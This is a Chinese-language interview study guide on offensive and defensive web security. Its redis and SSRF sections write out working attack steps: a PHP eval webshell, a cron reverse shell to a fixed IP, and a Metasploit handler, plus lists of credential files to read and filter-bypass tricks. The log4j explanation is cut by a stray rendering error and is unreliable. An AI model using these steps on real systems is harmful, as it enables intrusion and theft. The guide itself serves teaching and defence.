51、常見的安全工具有哪些？

端口及漏洞掃描：Namp
抓包：Wireshark、Burpsuite、Fiddler
Web自動化安全掃描：Awvs、Appscan、Xray、goby
信息收集：Oneforall
漏洞利用：MSF、CS
Webshell管理：菜刀、蟻劍、冰蝎、哥斯拉
內網工具：fscan、frp、nps
憑據密碼收集工具：mimikatz

52、說說Nmap工具的使用？

-sT TCP (全)連接掃描，準確但留下大量日志記錄-sS TCP SYN (半)掃描，速度較快，不會留下日志-sN null 掃描，標志位全為 0，不適用 Windows-sF FIN 掃描，標志位 FIN=1，不適用 Windows-O 查看目標主機系統版本-sV 探測服務版本-A 全面掃描

53、近幾年HW常見漏洞有哪些？

弱口令、未授權訪問、文件上傳、注入、log4j代碼執行、Struts2命令執行、fastjson、shiro、TinkPHP代
碼執行、Spring代碼執行等等。

54、HW 三（四）大洞

shiro、struts2、weblogic、Fastjson
額外：thinkphp、（2021年）log4j、（2022年）word msdt
55、講訴 2023 年護網出現過那些 0day 漏洞
藍凌OA前臺代碼執行
金山WPS RCE
泛微E-Office9文件上傳漏洞
泛微 Eoffice10 前臺 SQL 注入
用友GRP-U8存在信息泄露
用友暢捷通 SQL注入
大華智慧園區任意密碼讀取漏洞
致遠OA任意管理員登錄
廣聯達oa sql注入漏洞

56、獲得文件讀取漏洞，通常會讀哪些文件

linux
etc/passwd、etc/shadow直接讀密碼
/etc/hosts # 主機信息
/root/.bashrc # 環境變量
/root/.bash_history # 還有root外的其他用戶
/root/.viminfo # vim 信息
/root/.ssh/id_rsa # 拿私鑰直接ssh
/proc/xxxx/cmdline # 進程狀態枚舉 xxxx 可以為0000-9999 使用burpsuite
數據庫 config 文件
web 日志 access.log, error.log
ssh 日志
bash /root/.ssh/id_rsa /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
/etc/ssh/sshd_config /var/log/secure /etc/sysconfig/network-scripts/ifcfg-eth0
/etc/syscomfig/network-scripts/ifcfg-eth1
windows
C:\boot.ini //查看系統版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS 配置文件
C:\Windows\repair\sam //存儲系統初次安裝的密碼
C:\Program Files\mysql\my.ini //Mysql 配置
C:\Program Files\mysql\data\mysql\user.MY D //Mysql root
C:\Windows\php.ini //php 配置信息
C:\Windows\my.ini //Mysql 配置信息

57、了解過反序列化漏洞嗎？

原理：
序列化是指程序將對象轉化為字節序列從而便于存儲運輸的一種方式，反序列化則與其相反，即將字節序列轉
化為對象供程序使用。程序在進行反序列化時會調用一些函數，比如常見的PHP反序列化函數unserialize()以及
一些常見的魔術方法，比如構造函數_construct()，析構函數_destruct()，_wakeup()，_toString()，
_sleep()等等。如果這些函數在傳遞參數時沒有進行嚴格的過濾措施，那么攻擊者就可以構造惡意代碼并將其序列
化后傳入函數中，從而導致反序列化漏洞。
Java反序列化：Java反序列化就是將java對象轉化為字節序列的過程。反序列化的過程就是
1）、創建一個對象輸出流；
2）、通過對象輸出流的ReadObject()方法來讀取對象；

58、常見的框架漏洞？

log4j遠程代碼執行漏洞

原理：
Log4j 是Apache 的一個開源項目，是一款基于Java 的開源日志記錄工具。該漏洞主要是由于日志在打
印時當遇到KaTeX parse error: Expected '}', got 'EOF' at end of input: …： 在正常的log處理過程中對{這兩個緊鄰的字符做了檢測，一旦匹配到類似于表達式結構的字符串就會
觸發替換機制，將表達式的內容替換為表達式解析后的內容，而不是表達式本身，從而導致攻擊者構造
符合要求的表達式供系統執行

Fastjson反序列化漏洞

判斷：
正常請求是get請求并且沒有請求體，可以通過構造錯誤的POST請求，即可查看在返回包中是否有
fastjson這個字符串來判斷。
原理：
fastjson是阿里巴巴開發的一款將json字符串和java對象進行序列化和反序列化的開源json解析庫。
fastjson提供了autotype功能，在請求過程中，我們可以在請求包中通過修改@type的值，來反序列化
為指定的類型，而fastjson在反序列化過程中會設置和獲取類中的屬性，如果類中存在惡意方法，就會
導致代碼執行等這類問題。
無回顯怎么辦：
1.一種是直接將命令執行結果寫入到靜態資源文件里，如html、js等，然后通過http訪問就可以直接看
到結果
2.通過dnslog進行數據外帶，但如果無法執行dns請求就無法驗證了
3.直接將命令執行結果回顯到請求Poc的HTTP響應中

Shiro反序列化漏洞

原理：
Shiro是Apache下的一個開源Java安全框架，執行身份認證，授權，密碼和會話管理。shiro在用戶登錄
時除了賬號密碼外還提供了可傳遞選項remember me。用戶在登錄時如果勾選了remember me選
項，那么在下一次登錄時瀏覽器會攜帶cookie中的remember me字段發起請求，就不需要重新輸入用
戶名和密碼。
判斷：
1.數據返回包中包含rememberMe=deleteMe字段。
2.直接發送原數據包，返回的數據中不存在關鍵字可以通過在發送數據包的cookie中增加字段：
rememberMe=然后查看返回數據包中是否存在關鍵字。

shiro-550：

shiro反序列化漏洞利用有兩個關鍵點，首先是在shiro<1.2.4時，AES加密的密鑰Key被硬編碼在代碼
里，只要能獲取到這個key就可以構造惡意數據讓shiro識別為正常數據。另外就是shiro在驗證
rememberMe時使用了readObject方法，readObject用來執行反序列化后需要執行的代碼片段，從而
造成惡意命令可以被執行。攻擊者構造惡意代碼，并且序列化，AES加密，base64編碼后，作為cookie
的rememberMe字段發送。Shiro將rememberMe進行編碼，解密并且反序列化，最終造成反序列化
漏洞。

shiro-721：

不需要key，利用Padding Oracle Attack構造出RememberMe字段后段的值結合合法的Remember。

59、了解過redis數據庫和常見的漏洞嗎？

redis是一個非關系型數據庫，使用的默認端口是6379。常見的漏洞是未授權訪問漏洞，攻擊者無需認證就可以訪問內部數據。利用手段主要有：
第一種：向root權限賬戶寫入ssh公鑰文件，直接免密登錄服務器。(受害者redis非root權限運行會報錯)
條件：
服務器存在.ssh目錄且具有寫入的權限
原理：
在數據庫中插入一條數據，將本機的公鑰作為value，key值隨意，然后通過修改數據庫的默認路徑
為/root/.ssh和默認的緩沖文件authorized.keys，把緩沖的數據保存在文件里，這樣就可以在服務器端
的/root/.ssh下生成一個授權的key。
第二種：寫入webshell
條件：
已知web絕對路徑。
步驟：
1）、redis -cli -h 192.168.x.x 連接目標服務器
2）、config set dir “/var/www/html” 設置保存文件路徑
3）、config set dbfilename shell.php 設置保存文件名
4）、set x “\n\n<?php @eval($_POST['cmd']); ?>\n” 將webshell寫入x鍵值中
5）、save 保存
局限：
1）、服務器處于內網，寫入webshell后我們的公網IP無法連接。
2）、服務器IP地址不固定。
3）、6379端口不允許入方向。
4）、上傳webshell可能直接被殺毒軟件刪除。
第三種：反彈連接shell
設置監聽端口，常用的工具msf、netcat、socat
利用msf設置監聽步驟：
1）、use exploit/multi/handler
2）、set payload generic/shell_reverse_tcp
3）、set lhost 192.168.x.x 默認監聽端口為4444
4）、run
第四種：定時任務反彈shell
步驟：
1）、定時任務用的表達式 ：Cron表達式是一個字符串，該字符串由6個空格分為7個域，每一個域代表
一個時間含義。分 時 天 月 周 user-name(用戶) command(命令) 比如每過一分鐘向root用戶的定時任務中
寫入反彈連接命令
2）、config set dir /var/spool/cron/ //目錄切換到定時任務的文件夾中
3）、config set dbfilename root //設置保存文件名
4）、set x “\n * * * * * bash -i >& /dev/tcp/192.168.96.222/7777 0>&1\n” //將
反彈shell寫入x鍵值中
5）、save //保存
利用定時任務反彈shell在目標系統是Centos上可用，Ubuntu上有限制，理由如下：
1）、默認redis寫文件后是644的權限，但ubuntu要求執行定時任務
件/var/spool/cron/crontabs/權限必須是600也就是-rw-------才會執行，否則會報錯，而Centos的定時
任務文件權限644也能執行。
2）、redis保存RDB會存在亂碼，在Ubuntu上會報錯，而在Centos上不會報錯。
3）、兩個系統的定時任務文件目錄不同。
第五種：利用主從復制getshell
條件：
版本(4.x~5.0.5)
原理：
數據讀寫體量很大時，為了減輕服務器的壓力，redis提供了主從模式，主從模式就是指定一個redis實
例作為主機，其余的作為從機，其中主機和從機的數據是相同的，而從機只負責讀，主機只負責寫。通過讀寫分離
可以減輕服務器端的壓力。
利用工具：
RedisRogueServer
地址：
https://github.com/n0b0dyCN/redis-rogue-server
使用工具的命令：
python3 redis-rogue-server.py --rhost=x.x.x.x --lhost=x.x.x.x --exp=exp.so
兩種使用方法：
交互式
反彈式
限制：
利用這個方法getshell或者rce任意導致redis服務癱瘓，一般不建議使用
redis未授權訪問漏洞的防范措施：
1）、添加登錄密碼。
2）、修改默認端口。
3）、關閉端口。
4）、禁止以root用戶權限啟動，以低權限啟動redis服務。

60、SSRF怎么結合Redis相關漏洞利用？

主要通過兩種協議，dict協議和gopher協議。
第一種：dict協議利用redis相關漏洞：
探測端口：
ssrf.php?url=dict://x.x.x.x:$端口$ 利用burpsuite爆破端口
探測是否設置弱口令：
ssrf.php?url=dict://x.x.x.x:6379/info 已知端口利用info探測是否設置了密碼
爆破密碼：
ssrf.php?url=dict://x.x.x.x:6379/auth:$密碼$ 利用burpsuite爆破密碼
寫入webshell：
1）、url=dict://[http://xxx.xxx:6379/config:set:dir:/var/www/html]
(https://link.zhihu.com/?
target=http%3A//xxx.xxx%3A6379/config%3Aset%3Adir%3A/var/www/html) 切換文件目錄
2）、url=dict://[http://xxx.xxx:6379/config:set:dbfilename:webshell.php]
(https://link.zhihu.com/?
target=http%3A//xxx.xxx%3A6379/config%3Aset%3Adbfilename%3Awebshell.php) 設置保存文件
名
3）、url=dict://[http://xxx.xxx:6379/set:webshell:](https://link.zhihu.com/?
target=http%3A//xxx.xxx%3A6379/set%3Awebshell%3A)"
\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e" //利用dict協議寫
入webshell 以上的字符編碼是<?php phpinfo();?>的十六進制
4）、url=dict://x.x.x.x:6379/save 保存
5）、url=dict://[http://xxx.xxx:6379/config:set:dir:/var/www/html]
(https://link.zhihu.com/?
target=http%3A//xxx.xxx%3A6379/config%3Aset%3Adir%3A/var/www/html) 切換文件目錄
6）、url=dict://[http://xxx.xxx:6379/config:set:dbfilename:webshell.php]
(https://link.zhihu.com/?
target=http%3A//xxx.xxx%3A6379/config%3Aset%3Adbfilename%3Awebshell.php) 設置保存文件
名
7）、url=dict://[http://xxx.xxx:6379/set:webshell:](https://link.zhihu.com/?
target=http%3A//xxx.xxx%3A6379/set%3Awebshell%3A)"
\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"
8）、利用dict協議寫入webshell 以上的字符編碼是<?php phpinfo();?>的十六進制
9）、ssrf.php?url=dict://x.x.x.x:6379/save 保存
dict協議利用計劃任務反彈shell或者寫入ssh公鑰的手段類似
第二種：gopher協議利用redis未授權訪問漏洞寫入webshell：
常規利用步驟：
set x “\n\n\n<?php @eval($_POST['redis']);?>\n\n\n”
config set dir /var/www/html
config set dbfilename shell.php
save
//第一次url解碼和第二次url解碼
//同理其他類似計劃任務反彈和寫入ssh公鑰等getshell方式相似

61、sql注入getshell的幾種方式？

第一種方式：into outfile
利用條件：
1）、當前數據庫用戶是root
2）、知道網站的絕對路徑
3）、secure_file_priv沒有具體值
第二種方式：–os-shell
原理：–os-shell就是使用udf提權獲取WebShell。也是通過into oufile向服務器寫入兩個文件，一個
可以直接執行系統命令，一個進行上傳文件。
條件：
1）、要求為數據庫DBA，使用–is-dba查看當前網站連接的數據庫賬號是否為mysql user表中的管
理員如root，是則為dba
2）、secure_file_priv沒有具體值
3）、知道網站的絕對路徑
第三種方式：寫日志
條件：
嘗試用日志寫入木馬getshell不需要secure_file_priv沒有具體值，但是需要知道網站根目錄。

62、SQL注入漏洞

原理：
產生SQL注入漏洞的根本原因在于代碼中沒有對用戶輸入項進行驗證和處理便直接拼接 到查詢語句中。利用
SQL注入漏洞，攻擊者可以在應用的查詢語句中插入自己的SQL代碼并傳遞 給后臺SQL服務器時加以解析并執行。
分類：
1）、顯注。
2）、盲注（無回顯）： 時間型、布爾型、報錯型。
危害：
1）、數據庫信息泄露。
2）、網頁篡改。
3）、網站被掛馬，傳播惡意軟件。
4）、數據庫被惡意操作。
5）、服務器被植入后門。
6）、破壞硬盤或者服務器等硬件設備。
如何進行SQL注入的防御
1）、關閉應用的錯誤提示
2）、加waf
3）、對輸入進行過濾
4）、限制輸入長度
5）、限制好數據庫權限，drop/create/truncate等權限謹慎grant
6）、預編譯好sql語句，python和Php中一般使用?作為占位符。這種方法是從編程框架方面解 決利用占位
符參數的sql注入，只能說一定程度上防止注入。還有緩存溢出、終止字符等。
7）、數據庫信息加密安全（引導到密碼學方面）。不采用md5因為有彩虹表，一般是一次md5后 加鹽再
md5。
8）、清晰的編程規范，結對/自動化代碼review，加大量現成的解決方案（PreparedStatement，
ActiveRecord，歧義字符過濾， 只可訪問存儲過程 balabala）已經讓SQL注入的風險變得非常低了。
繞過技術：
1）、關鍵字可以用%（只限 IIS 系列）。比如 select，可以 sel%e%ct
2）、通殺的，內聯注釋，如 /!select/
3）、編碼，可兩次編碼
4）、multipart 請求繞過，在 POST 請求中添加一個上傳文件，繞過了絕大多數 WAF
5）、參數繞過，復制參數，id=1&id=1
6）、組合法 如 and 可以用&&再 URL 編碼
7）、替換法，如 and 改成&&;=可以用 like 或 in 等

63、CSRF漏洞

原理：CSRF跨站點請求偽造。攻擊者盜用了受害者的身份，以受害者的名義發送惡意請求，對 服務器來說這個請
求是完全合法的，但是卻完成了攻擊者所期望的一個操作
危害：
1）、對網站管理員進行攻擊
2）、修改受害網站上的用戶賬戶和數據
3）、賬戶劫持
4）、傳播CSRF蠕蟲進行大規模攻擊
5）、利用csrf進行拖庫
6）、利用其他漏洞進行組合拳攻擊
7）、針對路由器的csrf攻擊
如何防護：
1）、盡量使用POST，限制GET；
2）、瀏覽器Cookie策略；
3）、加驗證碼；
4）、Referer Check；
5）、Anti CSRF Token；

64、文件包含漏洞

類型
1）、本地文件包含
2）、遠程文件包含 ：即加載遠程文件，在php.ini中開allow_url_include 、 allow_url_fopen選
項。開啟后可以直接執行任意代碼。
利用：
1）、讀取敏感文件
2）、遠程包含shell
3）、圖片上傳并包含圖片shenll
4）、使用偽協議
5）、包含日志文件GetShell
6）、截斷包含
PHP文件包含函數
1）、include()：使用此函數，只有代碼執行到此函數時才將文件包含進來，發生錯誤時只警告 并繼續執
行。
2）、inclue_once()：功能和前者一樣，區別在于當重復調用同一文件時，程序只調用一次。
3）、require()：使用此函數，只要程序執行，立即調用此函數包含文件，發生錯誤時，會輸出 錯誤信息
并立即終止程序。
4）、require_once()：功能和前者一樣，區別在于當重復調用同一文件時，程序只調用一 次。
修復方案
1）、禁止遠程文件包含allow_url_include=off
2）、配置open_basedir=指定目錄，限制訪問區域。
3）、過濾 …/等特殊符號
4）、修改Apache日志文件的存放地址
5）、開啟魔術引號magic_quotes_qpc=on
6）、盡量不要使用動態變量調用文件，直接寫要包含的文件。

65、文件上傳漏洞

原理：
由于程序員在對用戶文件上傳功能實現代碼沒有嚴格限制用戶上傳文件后綴以及文件類型或者處理缺陷，而導
致用戶可以越過本身權限向服務器上傳木馬去控制服務器。
危害：
操作木馬文件提權 獲取網站權限
繞過方法：
黑名單
1）、后綴名不完整 .php5 .phtml等
2）、上傳 .htacess
3）、大小寫
4）、在數據包中后文件綴名前加空格
5）、后綴名前加 .
6）、加上::$DATA
7）、未循環驗證，可以使用x.php…類似的方法
白名單（一般需要配合其他漏洞一起利用）
1）、%00截斷
2）、圖片馬
3）、條件競爭
修復：
1）、后端驗證：采用服務端驗證模式。
2）、后綴驗證：基于白名單，黑名單過濾。
3）、MIME驗證：基于上傳自帶類型艱檢測。
4）、內容檢測：文件頭，完整性檢測。
5）、自帶函數過濾。
6）、WAF防護軟件：寶塔、云盾等。

66、SSRF漏洞

原理：
利用一個可以發起網絡請求的服務當作跳板來攻擊內部其他服務。
ssrf危害：
1）、探測內網信息,用協議探ftp%26ip={ip}%26port={port}
2）、攻擊內網或本地其他服務
3）、穿透防火墻
漏洞存在的地方：
1）、能夠對外發起網絡請求的地方。
2）、請求遠程服務器資源的地方。
3）、數據庫內置功能。
具體利用的方式：
具體操作需要查看支持的協議，file協議查看文件、dict協議探測端口、ophergopher協議 支持
GET&POST請求，同時在攻擊內網ftp、redis、telnet、Memcache上有極大作用利用 gopher協議訪問redis
反彈shell。
4）、郵件系統。
5）、文件處理。
6）、在線處理工具。
舉幾個例子：
1）、在線識圖，在線文檔翻譯，分享，訂閱等，這些有的都會發起網絡請求。
2）、根據遠程URL上傳，靜態資源圖片等，這些會請求遠程服務器的資源。
3）、數據庫的比如mongodb的copyDatabase函數，這點看豬豬俠講的吧，沒實踐過。
4）、郵件系統就是接收郵件服務器地址這些地方。
5）、文件就找ImageMagick，xml這些。
6）、從URL關鍵字中尋找，比如：source,share,link,src,imageurl,target等。
繞過姿勢
1）、http://example.com@127.0.0.1`
2）、利用IP地址的省略寫法繞過 ,[::]繞過localhost
3）、DNS解析 http://127.0.0.1.xip.io/可以指向任意ip的域名：xip.io
4）、利用八進制IP地址繞過 ,利用十六進制IP地址 ,繞過利用十進制的IP地址繞過
修復：
1）、地址做白名單處理
2）、域名識別IP 過濾內部IP
3）、校驗返回的內容對比是否與假定的一致

67、邏輯漏洞

1）、挖過的邏輯漏洞：
訂單任意金額修改
相同價格增加訂單數量，相同訂單數量減少產品價格，訂單價格設定為負數。
預防思路：
訂單需要多重效驗。
訂單數值較大的時候需要人工審核。
4）、接口無限制枚舉
某電商登陸接口無驗證導致撞庫
某招聘網驗證碼無限制枚舉
某快遞公司優惠券枚舉
2）、驗證碼回傳
漏洞一般發生在賬號密碼找回、賬號注冊、支付訂單等。驗證碼發送途徑一般為手機短信、郵 箱郵件
預防思路：
response數據內不包含驗證碼，驗證方式主要采取后端驗證，但是缺點是服務器的運算壓 力也會隨之增加。
如果要進行前端驗證的話也可以，但是需要進行加密。
3）、未進行登陸憑證驗證
有些業務的接口，因為缺少了對用戶的登陸憑證的效驗或者是驗證存在缺陷，導致黑客可以未 經授權訪問這
些敏感信息甚至是越權操作。比如后臺頁面、訂單ID枚舉、敏感信息可下載、沒 驗證ID或cookie驗證導致越權。
預防思路：
對敏感數據存在的接口和頁面做cookie，ssid，token或者其它驗證。
某電商會員卡卡號枚舉
預防思路：
在輸入接口設置驗證，如token，驗證碼等。如果設定驗證碼，最好不要單純的采取一個前 端驗證，最好選
擇后端驗證。如果設定token，請確保每個token只能采用一次，并且對 token設定時間參數。
注冊界面的接口不要返回太多敏感信息，以防遭到黑客制作枚舉字典。
驗證碼不要用短數字，盡量6位以上，最好是以字母加數字進行組合，并且驗證碼需要設定 時間期限。
優惠券，VIP卡號請盡量不要存在規律性和簡短性，并且優惠券最好是以數字加字母進行組合。
5）、cookie設置存在缺陷
Cookie的效驗值過于簡單。有些web對于cookie的生成過于單一或者簡單，導致黑客可以 對cookie的效驗
值進行一個枚舉 .
cookie存在被盜風險，即用戶重置密碼后使用老cookie依然可以通過驗證。
用戶的cookie數據加密應嚴格使用標準加密算法，并注意密鑰管理。不能采取簡單的 base64等算法。
越權：
平行越權：權限類型不變，權限ID改變；
垂直越權：權限ID不變，權限類型改變；
交叉越權：即改變ID，也改變權限；
預防思路
1）、cookie中設定多個驗證，比如自如APP的cookie中，需要sign和ssid兩個參數配對，才能返回數據。
2）、用戶的cookie數據加密應嚴格使用標準加密算法，并注意密鑰管理。
3）、用戶的cookie的生成過程中最好帶入用戶的密碼，一旦密碼改變，cookie的值也會改變。
4）、cookie中設定session參數，以防cookie可以長時間生效。
5）、根據業務不同還有很多方法。
67、XSS漏洞
原理:
通過插入惡意腳本，實現對用戶瀏覽器的攻擊。
類型:
存儲、反射、dom
XSS繞過：
1）、大小寫
2）、js偽協議
3）、沒有分號
4）、Flash
5）、Html5新標簽
6）、Fuzz進行測試
7）、雙層標簽繞過
反射和dom的區別:
DOM-XSS是javascript處理輸出， 而反射性xss是后臺程序處理。
修復防御：
1）、對輸入內容的特定字符進行編碼，例如表示html標記的 < > 等符號。
2）、對重要的cookie設置httpOnly, 防止客戶端通過document.cookie讀取 cookie，此 HTTP頭由服
務端設置。
3）、將不可信的值輸出URL參數之前，進行URLEncode操作，而對于從URL參數中獲取值一定要 進行格式檢
測（比如你需要的時URL，就判讀是否滿足URL格式）。
4）、不要使用Eval來解析并運行不確定的數據或代碼，對于JSON解析請使用 JSON.parse() 方法。

68、XXE漏洞

原理:
解析用戶傳入的xml
作用:
內網端口掃描、利用file協議等讀取文件、攻擊內網web應用使用get(struts2等)
危害：
1）、導致可以加載惡意外部文件
2）、造成文件讀取
3）、內網端口掃描
4）、攻擊內網網站
5）、發起dos攻擊等危害
防御:
過濾用戶提交的XML數據、如果你當前使用的程序為PHP，則可以將 libxml_disable_entity_loader設
置為TRUE來禁用外部實體，從而起到防御的目的。

69、代碼執行漏洞

原理：
沒有對接口輸入的內容進行嚴格的判斷 造成攻擊者精心構造的代碼非法執行，當應用在調用一些能將字符轉
化為代碼的函數(如PHP中的eval)時，沒有考慮用戶是否能控 制這個字符串，這就會造成代碼執行漏洞。
相關函數：
PHP：eval assert
Python：exec
asp：<%=CreateObject(“wscript.shell”).exec(“cmd.exe /c
ipconfig”).StdOut.ReadAll()%>
危害：
1）、執行代碼
2）、讓網站寫shell
3）、甚至控制服務器
漏洞利用：
1）、執行代碼的函數：eval、assert
2）、callback函數：preg_replace + /e模式
3）、反序列化：unserialize()(反序列化函數)
防御修復：
1）、使用json保存數組，當讀取時就不需要使用eval了。
2）、對于必須使用eval的地方，一定嚴格處理用戶數據
3）、字符串使用單引號包括可控代碼，插入前使用addslashes轉義。
4）、放棄使用preg_replace的e修飾符，使用preg_replace_callback()替換。
5）、若必須使用preg_replace的e修飾符，則必用單引號包裹正則匹配出的對象。

70、關于路徑覆蓋漏洞（不常問）

RPO的全稱為Relative Path Overwrite,也就是相對路徑覆蓋，利用客戶端和服務端的差 異，通過相對路徑來
引入我們想要的js或css文件，從而實現某種攻擊。
就目前來看此攻擊方法依賴于瀏覽器和網絡服務器的反應，基于服務器的Web緩存技術和配置 差異，以及服務器和
客戶端瀏覽器的解析差異，利用前端代碼中加載的css/js的相對路徑來加 載其他文件，最終瀏覽器將服務器返回
的不是css/js的文件當做css/js來解析，從而導致 XSS，信息泄露等漏洞產生。

71、郵件系統漏洞攻擊

漏洞攻擊是危害網絡安全中較為常見的一種。作為當今世界上使用最為頻繁的商務通信工具—— 郵件系統，更是屢屢
遭受漏洞攻擊的困擾，這不僅因為制造漏洞的途徑多，還以為郵件系統的 互聯網通信協議本身的問題。前者如程序
員因為工作失誤出現編碼漏洞，畢竟人非機器，在緊 張復雜的工作過程中，難免有個閃失，除了人為因素，還有軟
件編碼工具及編譯器造成的錯 誤，不同應用程序彼此之間的相互作用，如大多數程序必須與其它API相交互，保存
并檢索文 件，同時運行在多種不同類型的設備上，都會可能產生漏洞；后者如互聯網通信協議—TCP和 UDP，其開
放性常常引來黑客的攻擊；而IP地址的脆弱性，也給黑客的偽造提供了可能，從而 泄露遠程服務器的資源信息。
除了以上原因，據業界知名郵件通聯服務商U-Mail專家張工分析，常見漏洞大概可分為幾種：
一、IMAP 和 POP 漏洞：
這些協議常見弱點是密碼脆弱，同時，各種IMAP和POP服務還容易受到如緩沖區溢出等類型的 攻擊。
二、拒絕服務（DoS）攻擊：
1）、死亡之Ping——發送一個無效數據片段，該片段始于包結尾之前，但止于包結尾之后；
2）、同步攻擊——極快地發送TCP SYN包（它會啟動連接），使受攻擊的機器耗盡系統資源，進而 中斷合法
連接；
3）、循環——發送一個帶有完全相同的源／ 目的地址／端口的偽造SYN包，使系統陷入一個試圖完 成TCP連
接的無限循環中。
三、系統配置漏洞：
1）、默認配置——大多數系統在交付給客戶時都設置了易于使用的默認配置，被黑客盜用變得輕 松；
2）、空的／默認根密碼——許多機器都配置了空的或默認的根／管理員密碼，并且其數量多得驚人；
3）、漏洞創建——幾乎所有程序都可以配置為在不安全模式下運行，這會在系統上留下不必要的漏洞。
四、利用軟件問題：在服務器守護程序、客戶端應用程序、操作系統和網絡堆棧中，存在很多 的軟件錯誤，分為以
下幾類：
1）、緩沖區溢出——程序員會留出一定數目的字符空間來容納登錄用戶名，黑客則會通過發送比指 定字符串長
的字符串，其中包括服務器要執行的代碼，使之發生數據溢出，造成系統入侵。
2）、意外組合——程序通常是用很多層代碼構造而成的，入侵者可能會經常發送一些對于某一層毫 無意義，但
經過適當構造后對其他層有意義的輸入。
3）、未處理的輸入——大多數程序員都不考慮輸入不符合規范的信息時會發生什么。

72、DNS欺騙是什么？

定義： DNS欺騙就是攻擊者冒充域名服務器的一種欺騙行為。
原理：
如果可以冒充域名服務器，然后把查詢的IP地址設為攻擊者的IP地址，這樣的話，用戶上網就只能看到攻擊者
的主頁，而不是用戶想要取得的網站的主頁了，這就是DNS欺騙的基本 原理。 DNS欺騙其實并不是真的“黑掉”了
對方的網站，而是冒名頂替、招搖撞騙罷了。

73、DDOS攻擊

分布式拒絕服務攻擊（DDoS）是目前黑客經常采用而難以防范的攻擊手段。DoS的攻擊方式有 很多種，最基本的
DoS攻擊就是利用合理的服務請求來占用過多的服務資源，從而使合法用戶無法得到服務的響應。
抗D思想和方案
1）、負載均衡。
2）、花錢買流量清洗服務。
3）、CDN：web層，比如cc攻擊。
4）、分布式集群防御。
5）、高防：防大部分攻擊，udp、大型的cc攻擊。
6）、預防為主。
7）、系統漏洞。
8）、系統資源優化：過濾不必要的服務和端口。
9）、限制特定流量：檢查訪問來源做適當限制。

74、什么是CC攻擊

CC攻擊是DDOS（分布式拒絕服務）的一種，相比其它的DDOS攻擊CC似乎更有技術含量一些。這種攻擊你見不到真
實源IP，見不到特別大的異 常流量，但造成服務器無法進行正常連接。
CC攻擊的原理就是攻擊者控制某些主機不停地發 大量數據包給對方服務器造成服務器資源耗盡， 一直到宕機潰。
CC主要是用來攻擊頁面的， 每個人都有這樣的體驗：當一個 網頁訪問的人數特別多的時候，打開網頁就慢了，CC
就是模 擬多個用戶（多少 線程就是多少用戶）不停地進行訪問那些需要大量數據操作（就是需要大量 CPU時間）
的頁面，造成服務器資源的浪費，CPU長時間處100%，永遠都有處 理不完的連接直 至就網絡擁塞，正常的訪問被
中止。

75、常見的端口和對應的服務

1）、web類
這部分常有的漏洞有： （web漏洞/敏感目錄）第三方通用組件漏洞struts、thinkphp、 jboss、ganglia、
zabbix
80 web
80-89 web
8000-9090 web
2）、數據庫類（掃描弱口令）
1433
MSSQL
1521
3306
5432
Oracle
MySQL
PostgreSQL
3、特殊服務類（未授權/命令執行/漏洞）
443 SSL心臟滴血
873 Rsync未授權
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授權
7001、7002 weblogic默認弱口令、反序列化
9200、9300 elasticsearch 參考烏云：多玩某服務器ElasticSearch命令執行漏洞
11211 memcache未授權訪問
50000 SAP命令執行
50070、50030 hadoop默認端口未授權訪問
4、常用端口類（掃描弱口令/端口爆破）
21 ftp
22 ssh
23 telnet
2601、2604 zebra路由，默認密碼zebra
3389 遠程桌面
5、常見的端口漏洞
21 ftp FTP服務端有很多 anonymous 匿名未授權訪問 爆破
22 ssh root密碼爆破 后門用戶 可以google查一些關于ssh后門的文章 里面的默認密 碼 可能會登入進去
23 telnet 一般會發生在 路由器 或者交換機 嵌入式設備 管理端口 攻擊方法 弱口令
25 smtp 默認用戶 默認密碼 郵件賬號爆破
80 http web 常見的Owasp top 10 中間件反序列化 中間件溢出 fastcgi配置不 當 造成fastcgi端口泄露
110 pop3 默認用戶 默認密碼 郵件賬號爆破
443 https openssl 心臟滴血（影響范圍較小） SSL/TLS低版本存在的漏洞
135 139 445 netbios smb MS17010
3389 RDP CVE-2019-0708
3389和443、445有什么漏洞？
445：ms06_040，蠕蟲，勒索病毒、MS17-010
443：ssl心臟滴血
3389：rdp漏洞、弱口令、cve-2019-0708、ms12-20
端口合計詳情
161 SNMP
389 LDAP
512、513、514 Rexec
873 Rsync未授權
1025、1111 NSF
1433 sqlserver
1521 Oracle： （iSqlPlus port：5560、7778） 2082/2083 cpanel主機管理系統登錄
2222 DA虛擬主機管理系統登錄
2601、2604 zebra路由，默認密碼zebra
3128 squid代理默認端口，如果沒設置口令很可能直接漫游內網
3306 Mysql
3312/3311 kangle主機管理系統登錄
4440 rundeck 參考烏云：借用新浪某服務成功漫游新浪內網
5432 PostgreSQL
5900 vnc
5984 CouchDB
6082 varnish
6379 redis未授權
7001、7002 weblogic默認弱口令、反序列化
7778 kloxo主機控制面板登錄
8000-9090 都是一些常見的web端口，有些運維謝歡吧管理后臺開放在這些非80端口上
8080 tomcat/wDCP主機管理系統，默認弱口令
8080、8089、9090 jboss
8083 Vestacp主機管理系統
8649 ganglia
8888 amh/LuManager 主機管理系統默認端口
9200、9300 elasticsearch 參考烏云：多玩某服務器ElasticSearch命令執行漏洞
10000 Virtualmin/Webmin 服務器虛擬主機管理系統
11211 memcache未授權訪問
27017、27018 Mongodb未授權訪問
28017 mongodb統計頁面
50000 SAP命令執行
50070、50030 hadoop默認端口未授權訪問

76、身份認證漏洞最常見是？

1）、會話固定攻擊；
2）、cookie仿冒；
只要得到session和cookie即可偽造用戶身份。

77、驗證碼漏洞

1）、驗證碼漏洞存在暴力破解。
2）、可以通過js或改包方法進行繞過。

78、DOM 型XSS人工測試

人工測試思路：找到類似 document.write、innerHTML賦值、outterHTML 賦值、 window.location 操
作、寫javascript:后內容、eval、setTimeout 、setInterval 等直接執行之類的函數點。找到其變量，回
溯變量來源觀察是否可控，是否經 過安全函數。

79、為什么參數化查詢可以防止SQL注入？

原理:
使用參數化查詢數據庫服務器不會把參數的內容當作sql指令的一部分來執行，是在數 據庫完成sql指令的編
譯后才套用參數運行。
簡單的說:
參數化能防注入的原因在于 ,語句是語句，參數是參數，參數的值并不是語句的一 部分，數據庫只按語句的
語義跑。

80、各種常見的狀態碼？

200 OK //客戶端請求成功
403 Forbidden //服務器收到請求，但是拒絕提供服務
